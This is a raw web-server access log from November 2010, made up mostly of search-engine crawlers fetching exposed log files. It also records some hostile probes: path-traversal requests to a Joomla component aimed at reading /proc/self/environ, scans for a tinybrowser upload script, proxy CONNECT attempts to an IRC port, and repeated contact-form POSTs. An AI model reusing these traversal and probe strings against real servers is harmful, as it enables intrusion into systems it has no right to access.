92.82.225.31 - - [20/Nov/2010:15:51:25 -0800] "GET //dustinharley-error.log HTTP/1.1" 200 223 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:25 -0800] "GET //evilfuckers-access.log HTTP/1.1" 200 3409 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:25 -0800] "GET //evilfuckers-error.log HTTP/1.1" 200 110 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:26 -0800] "GET //ferality-access.log HTTP/1.1" 200 6567 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:26 -0800] "GET //ferality-error.log HTTP/1.1" 200 220 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:26 -0800] "GET //gorgeworld-access.log HTTP/1.1" 200 1243 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:27 -0800] "GET //gorgeworld-error.log HTTP/1.1" 200 331 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:27 -0800] "GET //jasoncmartin-access.log HTTP/1.1" 200 3356 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:27 -0800] "GET //jasoncmartin-error.log HTTP/1.1" 200 1001 "-" "Java/1.6.0_22"
92.82.225.31 - - [20/Nov/2010:15:51:27 -0800] "GET //log-access.log HTTP/1.1" 200 25461 "-" "Java/1.6.0_22"
91.201.66.28 - - [20/Nov/2010:16:49:33 -0800] "GET /terhanian-error.log HTTP/1.0" 200 - "http://redhatcasino.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)"
123.125.71.89 - - [20/Nov/2010:17:39:45 -0800] "GET /?C=S;O=A HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.141 - - [20/Nov/2010:17:50:48 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.143 - - [20/Nov/2010:17:50:52 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.82 - - [20/Nov/2010:18:19:45 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.87 - - [20/Nov/2010:18:24:26 -0800] "GET /terhanian-error.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.73 - - [20/Nov/2010:18:28:14 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 319 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.74 - - [20/Nov/2010:18:32:01 -0800] "GET /browserbomb-access.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.73 - - [20/Nov/2010:18:35:51 -0800] "GET /?C=N;O=D HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.84 - - [20/Nov/2010:18:39:36 -0800] "GET /2girls4lokos-access.log HTTP/1.1" 200 19063 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
93.158.148.31 - - [20/Nov/2010:18:39:51 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
123.125.71.89 - - [20/Nov/2010:18:43:23 -0800] "GET /dustinharley-error.log HTTP/1.1" 200 223 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.76 - - [20/Nov/2010:18:47:11 -0800] "GET /nov2010/ HTTP/1.1" 200 6156 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.74 - - [20/Nov/2010:18:50:55 -0800] "GET /gorgeworld-access.log HTTP/1.1" 200 1243 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.71.222.186 - - [20/Nov/2010:18:52:26 -0800] "GET / HTTP/1.0" 200 6182 "http://www.sitedossier.com/site/unusualdischarge.com" "-"
123.125.71.71 - - [20/Nov/2010:18:54:50 -0800] "GET /ferality-access.log HTTP/1.1" 200 7443 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.73 - - [20/Nov/2010:18:57:31 -0800] "GET /evilfuckers-error.log HTTP/1.1" 200 221 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.87 - - [20/Nov/2010:19:01:15 -0800] "GET /?C=S;O=A HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.12.239 - - [20/Nov/2010:19:03:20 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.12.239 - - [20/Nov/2010:19:03:20 -0800] "GET / HTTP/1.1" 200 6179 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
123.125.71.89 - - [20/Nov/2010:19:05:00 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 331 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.12.239 - - [20/Nov/2010:19:05:53 -0800] "GET /ferality-access.log HTTP/1.1" 200 7614 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
123.125.71.75 - - [20/Nov/2010:19:08:46 -0800] "GET /orbsucks-error.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.77 - - [20/Nov/2010:19:12:32 -0800] "GET /orbsucks-access.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.76 - - [20/Nov/2010:19:16:18 -0800] "GET /log-error.log HTTP/1.1" 200 3237 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.78 - - [20/Nov/2010:19:20:03 -0800] "GET /terhanian-access.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.77 - - [20/Nov/2010:19:23:49 -0800] "GET /clownjuice-error.log HTTP/1.1" 200 220 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.75 - - [20/Nov/2010:19:27:45 -0800] "GET /?C=D;O=A HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.86 - - [20/Nov/2010:19:31:28 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 - "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.88 - - [20/Nov/2010:19:35:13 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 109 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.74 - - [20/Nov/2010:19:39:00 -0800] "GET /clownjuice-access.log HTTP/1.1" 200 1441 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.85 - - [20/Nov/2010:19:42:46 -0800] "GET /?C=M;O=A HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.73 - - [20/Nov/2010:19:46:31 -0800] "GET /ferality-error.log HTTP/1.1" 200 327 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
141.213.233.23 - - [20/Nov/2010:19:46:34 -0800] "POST http://141.213.238.252:6667/ HTTP/1.0" 302 357 "-" "-"
141.213.233.23 - - [20/Nov/2010:19:46:34 -0800] "CONNECT 141.213.238.252:6667 HTTP/1.0" 405 374 "-" "-"
141.213.233.23 - - [20/Nov/2010:19:46:34 -0800] "CONNECT 141.213.238.252:6667 HTTP/1.0" 405 374 "-" "-"
123.125.71.81 - - [20/Nov/2010:19:50:17 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 4215 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.69 - - [20/Nov/2010:19:54:03 -0800] "GET /2girls4lokos-error.log HTTP/1.1" 200 6104 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.218 - - [20/Nov/2010:19:56:49 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [20/Nov/2010:19:56:49 -0800] "GET / HTTP/1.1" 200 6182 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.219.58.45 - - [20/Nov/2010:19:57:44 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:19:57:45 -0800] "GET / HTTP/1.1" 200 6179 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:19:57:45 -0800] "GET / HTTP/1.1" 200 6182 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:03:18 -0800] "GET /nov2010/ HTTP/1.1" 200 6156 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:07:36 -0800] "GET /nov2010/browserbomb-access.log HTTP/1.1" 200 202321 "-" "MLBot (www.metadatalabs.com/mlbot)"
92.243.84.187 - - [20/Nov/2010:20:11:00 -0800] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 302 360 "http://unusualdischarge.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
92.243.84.187 - - [20/Nov/2010:20:11:00 -0800] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 302 359 "http://mail.clownjuice.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
66.219.58.45 - - [20/Nov/2010:20:11:02 -0800] "GET /nov2010/clownjuice-access.log HTTP/1.1" 200 566552 "-" "MLBot (www.metadatalabs.com/mlbot)"
92.243.84.187 - - [20/Nov/2010:20:11:04 -0800] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 302 361 "http://sticky.clownjuice.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
66.219.58.45 - - [20/Nov/2010:20:13:49 -0800] "GET /nov2010/dustinharley-access.log HTTP/1.1" 200 4230194 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:16:00 -0800] "GET /nov2010/ferality-access.log HTTP/1.1" 200 3132544 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:17:45 -0800] "GET /nov2010/gorgeworld-access.log HTTP/1.1" 200 468902 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:19:28 -0800] "GET /nov2010/jasoncmartin-access.log HTTP/1.1" 200 2690013 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:20:58 -0800] "GET /nov2010/log-access.log HTTP/1.1" 200 6206155 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:22:13 -0800] "GET /nov2010/orbsucks-access.log HTTP/1.1" 200 1025768 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:23:17 -0800] "GET /nov2010/paxnihilo-access.log HTTP/1.1" 200 89293 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:24:12 -0800] "GET /nov2010/sharkbomb-access.log HTTP/1.1" 200 1521665 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:25:20 -0800] "GET /nov2010/terhanian-access.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:26:13 -0800] "GET /nov2010/vaginacide-access.log HTTP/1.1" 200 115342 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:27:09 -0800] "GET /nov2010/browserbomb-error.log HTTP/1.1" 200 125313 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:28:00 -0800] "GET /nov2010/clownjuice-error.log HTTP/1.1" 200 287600 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:28:52 -0800] "GET /nov2010/dustinharley-error.log HTTP/1.1" 200 545791 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:29:44 -0800] "GET /nov2010/evilfuckers-access.log HTTP/1.1" 200 1030253 "-" "MLBot (www.metadatalabs.com/mlbot)"
91.201.66.28 - - [20/Nov/2010:20:29:57 -0800] "GET / HTTP/1.0" 200 6181 "http://redhatcasino.com/" "Opera/9.00 (Windows NT 4.0; U; en)"
66.219.58.45 - - [20/Nov/2010:20:30:36 -0800] "GET /nov2010/evilfuckers-error.log HTTP/1.1" 200 275117 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:31:27 -0800] "GET /nov2010/ferality-error.log HTTP/1.1" 200 293986 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:32:18 -0800] "GET /nov2010/gorgeworld-error.log HTTP/1.1" 200 148355 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:33:10 -0800] "GET /nov2010/jasoncmartin-error.log HTTP/1.1" 200 956989 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:34:02 -0800] "GET /nov2010/log-error.log HTTP/1.1" 200 2419677 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:34:53 -0800] "GET /nov2010/orbsucks-error.log HTTP/1.1" 200 163396 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:35:45 -0800] "GET /nov2010/paxnihilo-error.log HTTP/1.1" 200 21130 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:36:43 -0800] "GET /nov2010/sharkbomb-error.log HTTP/1.1" 200 104679 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:37:35 -0800] "GET /nov2010/terhanian-error.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:38:27 -0800] "GET /nov2010/vaginacide-error.log HTTP/1.1" 200 36671 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:39:19 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 331 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:40:11 -0800] "GET /jasoncmartin-access.log HTTP/1.1" 200 3897 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:41:02 -0800] "GET /jasoncmartin-error.log HTTP/1.1" 200 1327 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:41:54 -0800] "GET /log-access.log HTTP/1.1" 200 37205 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:42:46 -0800] "GET /log-error.log HTTP/1.1" 200 7171 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:43:47 -0800] "GET /orbsucks-access.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:44:40 -0800] "GET /orbsucks-error.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:45:31 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 627 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:46:28 -0800] "GET /paxnihilo-error.log HTTP/1.1" 200 109 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:47:21 -0800] "GET /sharkbomb-access.log HTTP/1.1" 200 5940 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:48:14 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 420 "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:49:05 -0800] "GET /terhanian-access.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
66.219.58.45 - - [20/Nov/2010:20:49:57 -0800] "GET /terhanian-error.log HTTP/1.1" 200 - "-" "MLBot (www.metadatalabs.com/mlbot)"
91.201.66.28 - - [20/Nov/2010:21:37:11 -0800] "GET / HTTP/1.0" 200 6181 "http://redhatcasino.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
93.158.148.31 - - [20/Nov/2010:21:44:53 -0800] "GET /evilfuckers-access.log HTTP/1.1" 200 4669 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.71.218 - - [20/Nov/2010:22:13:20 -0800] "GET /2girls4lokos-error.log HTTP/1.1" 200 7014 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [20/Nov/2010:22:13:21 -0800] "GET /2girls4lokos-access.log HTTP/1.1" 200 30455 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [20/Nov/2010:22:13:22 -0800] "GET /nov2010/ HTTP/1.1" 200 6156 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.111 - - [20/Nov/2010:22:16:55 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.178 - - [20/Nov/2010:22:16:59 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.172.57.205 - - [20/Nov/2010:22:22:07 -0800] "POST /contact.php HTTP/1.1" 302 360 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
209.172.57.205 - - [20/Nov/2010:22:26:20 -0800] "POST /contact.php HTTP/1.1" 302 359 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
207.46.199.50 - - [20/Nov/2010:22:27:16 -0800] "GET /robots.txt HTTP/1.1" 302 360 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.199.50 - - [20/Nov/2010:22:27:17 -0800] "GET / HTTP/1.1" 200 6179 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
209.172.57.205 - - [20/Nov/2010:22:29:09 -0800] "POST /contact.php HTTP/1.1" 302 359 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
207.46.199.50 - - [20/Nov/2010:22:33:55 -0800] "GET /terhanian-error.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
209.172.57.205 - - [20/Nov/2010:22:35:19 -0800] "POST /contact.php HTTP/1.1" 302 360 "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)"
219.240.36.36 - - [20/Nov/2010:22:41:18 -0800] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 360 "-" "libwww-perl/5.65"
219.240.36.36 - - [20/Nov/2010:22:41:19 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.65"
207.46.199.44 - - [20/Nov/2010:22:47:59 -0800] "GET /sharkbomb-access.log HTTP/1.1" 200 7328 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.71.218 - - [20/Nov/2010:23:03:22 -0800] "GET /browserbomb-error.log HTTP/1.1" 200 110 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.98 - - [20/Nov/2010:23:24:36 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.201.66.28 - - [20/Nov/2010:23:24:44 -0800] "GET / HTTP/1.0" 200 6181 "http://redhatcasino.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727)"
220.181.108.183 - - [20/Nov/2010:23:24:58 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.77 - - [20/Nov/2010:23:39:25 -0800] "GET /sharkbomb-error.log HTTP/1.1" 200 420 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.218 - - [21/Nov/2010:00:28:40 -0800] "GET /nov2010/gorgeworld-error.log HTTP/1.1" 200 148355 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:28:42 -0800] "GET /nov2010/terhanian-access.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:28:44 -0800] "GET /nov2010/log-error.log HTTP/1.1" 200 2419677 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:29:15 -0800] "GET /nov2010/ferality-error.log HTTP/1.1" 200 293986 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:29:24 -0800] "GET /nov2010/evilfuckers-error.log HTTP/1.1" 200 275117 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:29:34 -0800] "GET /nov2010/log-access.log HTTP/1.1" 200 6206155 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:30:49 -0800] "GET /nov2010/orbsucks-error.log HTTP/1.1" 200 163396 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:32:34 -0800] "GET /nov2010/sharkbomb-error.log HTTP/1.1" 200 104679 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:34:43 -0800] "GET /nov2010/paxnihilo-error.log HTTP/1.1" 200 21130 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:36:52 -0800] "GET /nov2010/ferality-access.log HTTP/1.1" 200 3132544 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:39:01 -0800] "GET /nov2010/orbsucks-access.log HTTP/1.1" 200 1025768 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:41:10 -0800] "GET /nov2010/terhanian-error.log HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:43:19 -0800] "GET /nov2010/sharkbomb-access.log HTTP/1.1" 200 1521665 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:45:28 -0800] "GET /nov2010/vaginacide-error.log HTTP/1.1" 200 36671 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:47:36 -0800] "GET /nov2010/paxnihilo-access.log HTTP/1.1" 200 89293 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:49:45 -0800] "GET /nov2010/clownjuice-error.log HTTP/1.1" 200 287600 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [21/Nov/2010:00:49:55 -0800] "GET /paxnihilo-access.log HTTP/1.1" 200 627 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.71.218 - - [21/Nov/2010:00:51:54 -0800] "GET /nov2010/browserbomb-error.log HTTP/1.1" 200 125313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:54:03 -0800] "GET /nov2010/clownjuice-access.log HTTP/1.1" 200 566552 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:56:12 -0800] "GET /nov2010/vaginacide-access.log HTTP/1.1" 200 115342 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:00:58:21 -0800] "GET /nov2010/gorgeworld-access.log HTTP/1.1" 200 468902 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
93.158.148.31 - - [21/Nov/2010:00:59:40 -0800] "GET /?C=M;O=A HTTP/1.1" 200 6182 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.71.218 - - [21/Nov/2010:01:00:30 -0800] "GET /nov2010/jasoncmartin-error.log HTTP/1.1" 200 956989 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:01:02:39 -0800] "GET /nov2010/evilfuckers-access.log HTTP/1.1" 200 1030253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:01:04:48 -0800] "GET /nov2010/dustinharley-error.log HTTP/1.1" 200 545791 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:01:06:57 -0800] "GET /nov2010/browserbomb-access.log HTTP/1.1" 200 202321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:01:09:06 -0800] "GET /nov2010/jasoncmartin-access.log HTTP/1.1" 200 2690013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.218 - - [21/Nov/2010:01:11:31 -0800] "GET /nov2010/dustinharley-access.log HTTP/1.1" 200 4230194 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
123.125.71.117 - - [21/Nov/2010:01:17:00 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
220.181.108.178 - - [21/Nov/2010:01:17:05 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
91.201.66.28 - - [21/Nov/2010:02:11:31 -0800] "GET / HTTP/1.0" 200 6181 "http://redhatcasino.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
123.125.71.104 - - [21/Nov/2010:02:17:43 -0800] "GET / HTTP/1.1" 200 6182 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.61.244.6 - - [21/Nov/2010:03:03:58 -0800] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 360 "-" "libwww-perl/5.76"
209.61.244.6 - - [21/Nov/2010:03:04:03 -0800] "GET / HTTP/1.1" 200 6179 "-" "libwww-perl/5.76"
119.63.198.14 - - [21/Nov/2010:04:10:10 -0800] "GET /robots.txt HTTP/1.1" 302 357 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
119.63.198.30 - - [21/Nov/2010:04:10:10 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.70 - - [21/Nov/2010:05:15:40 -0800] "GET / HTTP/1.1" 200 6179 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.71.77 - - [21/Nov/2010:05:19:26 -0800] "GET /log-access.log HTTP/1.1" 200 48201 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.225 - - [21/Nov/2010:05:32:30 -0800] "GET /robots.txt HTTP/1.1" 302 361 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.225 - - [21/Nov/2010:05:32:30 -0800] "GET /gorgeworld-error.log HTTP/1.1" 200 441 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
